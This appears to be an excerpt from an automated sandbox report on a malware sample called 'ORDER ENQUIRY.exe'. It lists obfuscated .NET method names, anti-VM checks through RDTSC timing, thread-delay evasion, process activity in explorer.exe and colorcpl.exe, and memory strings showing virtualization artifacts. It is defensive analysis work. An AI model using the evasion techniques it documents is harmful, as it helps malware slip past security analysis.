Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, a55VxBJyX8xc1ppeTh.cs	High entropy of concatenated method names: 'CuHnl4dv7X', 'TZSnCDMY8j', 'JinnodL6bY', 'IWanpB3uaO', 'BfLnf6RX4q', 'r6KnZygifx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, CW1pMBhOUDii4MrnC7.cs	High entropy of concatenated method names: 'JXC37yjyOq', 'QVr3TRJtrq', 'hx03NHrJC2', 'T2v3h9OEXj', 'ued3aQHT9D', 'Pvf3IR5Wi2', 'zud3dqVi02', 'wtpnBlG8Hp', 'QRjnxgrIcV', 'XSinjvuYV8'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, g39uTpCX0vM1y2JMYw.cs	High entropy of concatenated method names: 'XChgx0kgAF', 'cQag4B9AHT', 'XDZn8ECfBP', 'Ps4n7IIWS7', 'zDYgc82700', 'GuJgQkrqnq', 'ItOgF2GfZT', 'LOAgfyJ8cE', 'gfUgUNni1p', 'KFlgSQr21l'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, foiGiGuDVbYuTHWVS4.cs	High entropy of concatenated method names: 'cUrgV8umDt', 'NIjg5gf0M2', 'ToString', 'wMDghP4IAL', 'l2Cgal3II3', 'OItgiNGm41', 'HwTgIx3xUe', 'V6Ugd6sK1i', 'mjpgYpxfLM', 'tD6g1rYc03'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, sYyXiJzPs8f6B0UTMQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LmI3wbotnP', 'KxM3OYHfqR', 'p8b3J0U34i', 'RSj3gP1sLc', 'IHo3nta8n5', 'zvt33oVctI', 'hHj39xk8uG'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, JQEmVVaTiWJ3o6gcRl.cs	High entropy of concatenated method names: 'Kc6YLng3cN', 'k7OYRaU70p', 'sFTYexeQxr', 'y0vYvZI6f6', 'yHgYDBNiAh', 'X7tYPmwd7Z', 'mMmYEjuGif', 'GmOYtoRqIH', 'TcgYyZmeyU', 'MBPYACNy1k'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, a9GUxVSCwgN5ZNwMVV.cs	High entropy of concatenated method names: 'KAbIDX3ryL', 'nbCIEHSuow', 'JR0io18WbM', 'j23iphbv92', 'ergiZU8V66', 'mI8i2i7THn', 'oqNisoRmb5', 'VQWi0qnf3g', 'qRJik3Iwb8', 'VpkiuGvXrV'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.cs	High entropy of concatenated method names: 'TjETMeKTaX', 'HaYThmV1cT', 'zCATal6W3h', 'KM1TijSLyn', 'zkVTIWlf4L', 'koeTduWJFR', 'OV2TY23KKl', 'qgcT18JJ6p', 'MG0TXoamL0', 'yXxTVHdOJY'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, lCxoYEPk8fPYc32YtB.cs	High entropy of concatenated method names: 'jxxivqufkK', 'IL2iPnOBwe', 'GNkitGTXX8', 'v6Tiy5urxW', 'PjciOp03B7', 'IwLiJxSwYD', 'CeEigqVjh3', 'KdKin6VPJS', 'hr9i3f7bD9', 'LsBi9Ul106'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, dm7XQHq1x5DqqWtUDF.cs	High entropy of concatenated method names: 'wUlOuJ19VC', 'prpOQCLqZH', 'hCFOfAmllk', 'BFeOUJKKAO', 'fnROCC8Zq8', 'i1FOoqdyI6', 'AvBOpBcr9S', 'Mt9OZ1Snwv', 'w3WO2gtF0I', 'lx9OsDP9Xu'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, fXtQ0SsxXOEHo55xgTh.cs	High entropy of concatenated method names: 'foI3LOxbaN', 'vSK3RQS46P', 'oM03ew6Vfp', 'w4C3vAjN8r', 'vSE3DpPU9E', 'CbY3P9swN7', 'Yyt3Ef7VSF', 'PR33tAb5vL', 'aUa3yDlGE9', 'Jpj3A2E6ha'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, yMg9DBE5xlkLGF6884.cs	High entropy of concatenated method names: 'k2swtbD6OO', 'R5Ewyld23i', 'hs6wljFqSH', 'vmZwCgDPo6', 'Po6wp81t95', 'vaWwZ8UeIh', 'kmuws302Md', 'nbAw0y2g3M', 'ffHwuW7iA7', 'o5iwcc0mGx'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, cAfcQJsOqYr7bPf96KK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JN99fwMMQ5', 'neX9UePXEG', 'lWv9Spjq71', 'Xrd9Gtaotp', 'ePg9maUQsr', 'UcX9qufODi', 'rOY9BIZTkF'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, uyO80QM5DlYBNnlsDa.cs	High entropy of concatenated method names: 'eGNafWF1Yp', 'TQ9aUlmv0w', 'RIYaSdh4AI', 'ts5aGCthGH', 'f6QamvmyNR', 'CYfaqq6sn9', 'pF2aBPDynl', 'MFIaxTKd8D', 'MX8ajyMJUp', 'sdKa4s28NB'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, zCFGixj484S7Ql8D4f.cs	High entropy of concatenated method names: 'lKMYhIhac4', 'vicYiyem7Q', 'h6JYdvDjKu', 'iIrd4NFx2H', 'TgWdzdRhwt', 'TvvY8nlvDr', 'baoY7wweRL', 'DFnYr5nAqX', 'E2tYT3OtCx', 'Dn3YNtWTfi'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, f4rgMLZ4hwflUve3f2.cs	High entropy of concatenated method names: 'ihTnhAJukf', 'tCenaA2nMW', 'sZdni2MIhq', 'E6KnIomhNr', 'hDundMyA6b', 'GI8nYkc3w7', 'qMen1VR1sY', 'ArjnXSM4hA', 'riLnV2RiR5', 'VF4n5qsNb9'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, CSclcFcCtPnMCmOXGw.cs	High entropy of concatenated method names: 'JqWdMgOxsh', 'uGWdaAyLK4', 'XZ4dIYLsqp', 'ntUdY4oVF2', 'wIWd11QOxI', 'YdhImcbM4x', 'HVnIqjlK0b', 'ClsIBosXfY', 'WRjIxmQsHH', 'DPdIjHGma7'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, pRbfB1NeeV0ZSBUnrQ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ncXrjUiFvu', 'JQ1r4AhZFA', 'sHgrzrm3nS', 'POkT8lAE1W', 'f3AT7O9wD5', 'KTtTr2tpot', 'rwGTTEcapA', 't2Ga8qAHANk6UxeLh5b'
Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, BQ8b6VfSVT1dlR2xSO.cs	High entropy of concatenated method names: 'ffQe339n6', 'KuDveSQSh', 'XgvP0OM0v', 'CbRETINHY', 'wEnyetTc4', 'gZoAagCwW', 'kVOOAuDeFH4YxJYAj6', 'SgYsgh4vVcWBiMgCml', 'r6DnZpJWK', 'v0n9AELQ1'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, CTaj1jy4xgrGq5RHHk.cs	High entropy of concatenated method names: 'Dispose', 'hkd7jEFGad', 'UhOrCfWRYb', 'iod66TEudB', 'N6I74Twih3', 'KiT7zeMtdZ', 'ProcessDialogKey', 'q7vr8fCpBl', 'Tser7fWrUu', 'hk2rr9Z5JR'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, QyI0xEwmLs04ImZyI1.cs	High entropy of concatenated method names: 'tfP7YC3T4X', 'mBd71VjTL6', 'nVI7VH3Tyx', 'Nag753eS1Z', 'Yt97OJZC5K', 'z3s7J8MAIR', 'wRIcdFM1S92C9diWiK', 'jIpBU4NwZqdRHiZb5f', 'HVe77FltPm', 'CU37TRcJ7a'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, a55VxBJyX8xc1ppeTh.cs	High entropy of concatenated method names: 'CuHnl4dv7X', 'TZSnCDMY8j', 'JinnodL6bY', 'IWanpB3uaO', 'BfLnf6RX4q', 'r6KnZygifx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, CW1pMBhOUDii4MrnC7.cs	High entropy of concatenated method names: 'JXC37yjyOq', 'QVr3TRJtrq', 'hx03NHrJC2', 'T2v3h9OEXj', 'ued3aQHT9D', 'Pvf3IR5Wi2', 'zud3dqVi02', 'wtpnBlG8Hp', 'QRjnxgrIcV', 'XSinjvuYV8'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, g39uTpCX0vM1y2JMYw.cs	High entropy of concatenated method names: 'XChgx0kgAF', 'cQag4B9AHT', 'XDZn8ECfBP', 'Ps4n7IIWS7', 'zDYgc82700', 'GuJgQkrqnq', 'ItOgF2GfZT', 'LOAgfyJ8cE', 'gfUgUNni1p', 'KFlgSQr21l'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, foiGiGuDVbYuTHWVS4.cs	High entropy of concatenated method names: 'cUrgV8umDt', 'NIjg5gf0M2', 'ToString', 'wMDghP4IAL', 'l2Cgal3II3', 'OItgiNGm41', 'HwTgIx3xUe', 'V6Ugd6sK1i', 'mjpgYpxfLM', 'tD6g1rYc03'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, sYyXiJzPs8f6B0UTMQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LmI3wbotnP', 'KxM3OYHfqR', 'p8b3J0U34i', 'RSj3gP1sLc', 'IHo3nta8n5', 'zvt33oVctI', 'hHj39xk8uG'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, JQEmVVaTiWJ3o6gcRl.cs	High entropy of concatenated method names: 'Kc6YLng3cN', 'k7OYRaU70p', 'sFTYexeQxr', 'y0vYvZI6f6', 'yHgYDBNiAh', 'X7tYPmwd7Z', 'mMmYEjuGif', 'GmOYtoRqIH', 'TcgYyZmeyU', 'MBPYACNy1k'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, a9GUxVSCwgN5ZNwMVV.cs	High entropy of concatenated method names: 'KAbIDX3ryL', 'nbCIEHSuow', 'JR0io18WbM', 'j23iphbv92', 'ergiZU8V66', 'mI8i2i7THn', 'oqNisoRmb5', 'VQWi0qnf3g', 'qRJik3Iwb8', 'VpkiuGvXrV'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.cs	High entropy of concatenated method names: 'TjETMeKTaX', 'HaYThmV1cT', 'zCATal6W3h', 'KM1TijSLyn', 'zkVTIWlf4L', 'koeTduWJFR', 'OV2TY23KKl', 'qgcT18JJ6p', 'MG0TXoamL0', 'yXxTVHdOJY'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, lCxoYEPk8fPYc32YtB.cs	High entropy of concatenated method names: 'jxxivqufkK', 'IL2iPnOBwe', 'GNkitGTXX8', 'v6Tiy5urxW', 'PjciOp03B7', 'IwLiJxSwYD', 'CeEigqVjh3', 'KdKin6VPJS', 'hr9i3f7bD9', 'LsBi9Ul106'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, dm7XQHq1x5DqqWtUDF.cs	High entropy of concatenated method names: 'wUlOuJ19VC', 'prpOQCLqZH', 'hCFOfAmllk', 'BFeOUJKKAO', 'fnROCC8Zq8', 'i1FOoqdyI6', 'AvBOpBcr9S', 'Mt9OZ1Snwv', 'w3WO2gtF0I', 'lx9OsDP9Xu'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, fXtQ0SsxXOEHo55xgTh.cs	High entropy of concatenated method names: 'foI3LOxbaN', 'vSK3RQS46P', 'oM03ew6Vfp', 'w4C3vAjN8r', 'vSE3DpPU9E', 'CbY3P9swN7', 'Yyt3Ef7VSF', 'PR33tAb5vL', 'aUa3yDlGE9', 'Jpj3A2E6ha'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, yMg9DBE5xlkLGF6884.cs	High entropy of concatenated method names: 'k2swtbD6OO', 'R5Ewyld23i', 'hs6wljFqSH', 'vmZwCgDPo6', 'Po6wp81t95', 'vaWwZ8UeIh', 'kmuws302Md', 'nbAw0y2g3M', 'ffHwuW7iA7', 'o5iwcc0mGx'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, cAfcQJsOqYr7bPf96KK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JN99fwMMQ5', 'neX9UePXEG', 'lWv9Spjq71', 'Xrd9Gtaotp', 'ePg9maUQsr', 'UcX9qufODi', 'rOY9BIZTkF'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, uyO80QM5DlYBNnlsDa.cs	High entropy of concatenated method names: 'eGNafWF1Yp', 'TQ9aUlmv0w', 'RIYaSdh4AI', 'ts5aGCthGH', 'f6QamvmyNR', 'CYfaqq6sn9', 'pF2aBPDynl', 'MFIaxTKd8D', 'MX8ajyMJUp', 'sdKa4s28NB'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, zCFGixj484S7Ql8D4f.cs	High entropy of concatenated method names: 'lKMYhIhac4', 'vicYiyem7Q', 'h6JYdvDjKu', 'iIrd4NFx2H', 'TgWdzdRhwt', 'TvvY8nlvDr', 'baoY7wweRL', 'DFnYr5nAqX', 'E2tYT3OtCx', 'Dn3YNtWTfi'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, f4rgMLZ4hwflUve3f2.cs	High entropy of concatenated method names: 'ihTnhAJukf', 'tCenaA2nMW', 'sZdni2MIhq', 'E6KnIomhNr', 'hDundMyA6b', 'GI8nYkc3w7', 'qMen1VR1sY', 'ArjnXSM4hA', 'riLnV2RiR5', 'VF4n5qsNb9'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, CSclcFcCtPnMCmOXGw.cs	High entropy of concatenated method names: 'JqWdMgOxsh', 'uGWdaAyLK4', 'XZ4dIYLsqp', 'ntUdY4oVF2', 'wIWd11QOxI', 'YdhImcbM4x', 'HVnIqjlK0b', 'ClsIBosXfY', 'WRjIxmQsHH', 'DPdIjHGma7'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, pRbfB1NeeV0ZSBUnrQ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ncXrjUiFvu', 'JQ1r4AhZFA', 'sHgrzrm3nS', 'POkT8lAE1W', 'f3AT7O9wD5', 'KTtTr2tpot', 'rwGTTEcapA', 't2Ga8qAHANk6UxeLh5b'
Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, BQ8b6VfSVT1dlR2xSO.cs	High entropy of concatenated method names: 'ffQe339n6', 'KuDveSQSh', 'XgvP0OM0v', 'CbRETINHY', 'wEnyetTc4', 'gZoAagCwW', 'kVOOAuDeFH4YxJYAj6', 'SgYsgh4vVcWBiMgCml', 'r6DnZpJWK', 'v0n9AELQ1'

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ORDER ENQUIRY.exe PID: 3032, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 2879904 second address: 287990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 2879B6E second address: 2879B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: 92A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: A2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: A4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: B4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: BA80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Memory allocated: CA80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Code function: 3_2_00409AA0 rdtsc

3_2_00409AA0

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4825	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5110	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 893	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 1840	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 8131	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_4-13905

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.2 %

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe TID: 3868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1076	Thread sleep count: 4825 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1076	Thread sleep time: -9650000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1076	Thread sleep count: 5110 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1076	Thread sleep time: -10220000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192	Thread sleep count: 1840 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192	Thread sleep time: -3680000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192	Thread sleep count: 8131 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192	Thread sleep time: -16262000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000004.00000002.4553917152.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000004.00000002.4556219779.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
